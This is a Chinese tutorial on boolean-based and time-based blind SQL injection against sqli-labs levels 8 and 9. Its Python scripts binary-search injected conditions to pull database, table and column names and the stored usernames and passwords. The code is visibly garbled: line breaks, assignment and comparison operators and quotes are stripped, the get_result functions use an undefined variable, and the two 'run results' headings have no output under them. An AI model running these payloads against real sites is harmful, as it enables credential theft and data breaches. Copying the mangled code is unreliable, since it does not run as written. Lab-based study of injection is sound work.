一、布尔盲注
布尔盲注（Boolean-based Blind SQL Injection）是一种SQL注入技术，用于在应用程序不直接显示数据库查询结果的情况下，通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的…
布尔盲注（Boolean-based Blind SQL Injection）是一种SQL注入技术，用于在应用程序不直接显示数据库查询结果的情况下，通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假，进而推断出数据库中的具体信息。
案例为 sqli-labs 中的第八关，采用二分查找。
python脚本
import requests
def get_database(URL):# 获取数据库名称s for i in range(1, 10):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and greatest(ascii(substr(database(),{i},1)),{mid}){mid} -- } # 相当于第一个字符{mid}条件判断为真res requests.get(urlURL, paramspayload)if You are in in res.text:high midmid (low high) // 2else:low mid 1mid (low high) // 2s chr(mid)print(数据库名称: s)def get_table(URL):# 获取表名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema\security\),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(表的名称: s)def get_column(URL):# 获取管理员的字段名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema\security\ and table_name\users\),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表的列: s)def get_result(URl):# 获取用户名和密码信息s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表具体数据: s)if __name__ __main__:URL http://127.0.0.1/sqlilabs/Less-8/index.phpget_database(URL)get_table(URL)get_column(URL)get_result(URL)
运行结果
二、时间盲注
时间盲注（Time-based Blind SQL Injection）是一种SQL注入技术，用于在应用程序没有直接回显数据库查询结果的情况下，通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。
案例为 sqli-labs 中的第九关，同样为二分查找。
python脚本
import requests
import datetimedef get_database(URL):# 获取数据库名称s for i in range(1, 10):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((greatest(ascii(substr(database(),{i},1)),{mid}){mid}),sleep(3),1) -- } # 相当于第一个字符{mid}条件判断为真start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:high midmid (low high) // 2else:low mid 1mid (low high) // 2s chr(mid)print(数据库名称: s)def get_table(URL):# 获取表名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema\security\),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(表的名称: s)def get_column(URL):# 获取管理员的字段名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema\security\ and table_name\users\),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表的列: s)def get_result(URl):# 获取用户名和密码信息s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users中的具体数据: s)if __name__ __main__:URL http://127.0.0.1/sqlilabs/Less-9/index.php# get_database(URL)get_table(URL)# get_column(URL)# get_result(URL)
运行结果